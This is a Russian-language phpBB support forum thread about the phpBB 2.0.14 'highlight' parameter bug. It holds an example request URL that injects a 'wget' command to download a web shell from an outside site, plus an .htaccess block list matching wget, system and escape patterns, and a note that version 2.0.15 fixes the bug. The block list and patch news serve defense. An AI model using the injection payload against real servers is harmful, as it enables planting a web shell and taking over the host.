как его сделать.??? мне протестировать надо!!!!!
Уязвимость phpbb 2.0.14
-
sigal
- phpBB Plus
- Сообщения: 442
- Стаж: 21 год 6 месяцев
- Откуда: КПРФ ;)
-
alexenin
- phpBB 1.2.1
- Сообщения: 27
- Стаж: 21 год 5 месяцев
-
Егор Наклоняев
- phpBB 2.0.4
- Сообщения: 404
- Стаж: 21 год 1 месяц
- Откуда: оттуда
quazi
Естественно, существовало. Там же написано.
Знаете, мне пофигу что делает этот баг, и что можно вредного туда запихнуть, я не кулхацкер - я пожилой мужчина обремененный семьёй, детьми и домашними животными. Я заметил, что он даёт искажения внешнего вида страницы, ergo при определенных условиях он может дать какую-либо бяку. Посему не мудрствуя лукаво зарезал на будущее все запросы такого вида и настучал в phpBB.com.
Dixi.
Естественно, существовало. Там же написано.
Знаете, мне пофигу что делает этот баг, и что можно вредного туда запихнуть, я не кулхацкер - я пожилой мужчина обремененный семьёй, детьми и домашними животными. Я заметил, что он даёт искажения внешнего вида страницы, ergo при определенных условиях он может дать какую-либо бяку. Посему не мудрствуя лукаво зарезал на будущее все запросы такого вида и настучал в phpBB.com.
Dixi.
-
Slimmy
- phpBB 1.4.0
- Сообщения: 34
- Стаж: 21 год
- Откуда: Солнечный Баку
sigal, опять-таки, этот баг (если можно Это назвать так) может быть полезен взломщику только если у хостера руки кривые.
Например, если хостер чмо, то поправив запрос можно изменить запрос
на
и кранты серверу))
А если у тебя не появилось ничего подозрительного при попытке ПЕРВОГО запроса, то беспокоится не о чем.
Например, если хостер чмо, то поправив запрос можно изменить запрос
Код: Выделить всё
http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=\[]\Код: Выделить всё
http://www.example.com/phpBB2/viewtopic.php?p=3&highlight=wget%20site.com/shell.phpА если у тебя не появилось ничего подозрительного при попытке ПЕРВОГО запроса, то беспокоится не о чем.
Подпись ушла...
-
Netman
- phpBB 1.2.0
- Сообщения: 19
- Стаж: 21 год
- Откуда: Minsk
-
boom
- phpBB 1.2.0
- Сообщения: 14
- Стаж: 20 лет 10 месяцев
-
apaxuc
- phpBB 1.2.0
- Сообщения: 15
- Стаж: 20 лет 7 месяцев
<IfModule mod_charset.c>boom писал(а):Отцы! Покажите, пожалуйста, актуальное содержание .htaccess для форума. У меня там пару строк есть, но чую не доброе... Грустно и как то жалко...
CharsetRecodeMultipartForms off
</IfModule>
RewriteEngine on
RewriteBase /
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\\\[ [OR]
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^(.*)$ http://127.0.0.1/ [L,R=permanent]
Кладеца в корень форума.
-
Rick
- phpBB 1.4.2
- Сообщения: 63
- Стаж: 21 год
Вышла версия 2.0.15, в которой этот баг фиксится (Fixed bug in highlight code to escape characters correctly)
http://www.phpbbguru.net/community/viewtopic.php?t=2888
http://www.phpbbguru.net/community/viewtopic.php?t=2888

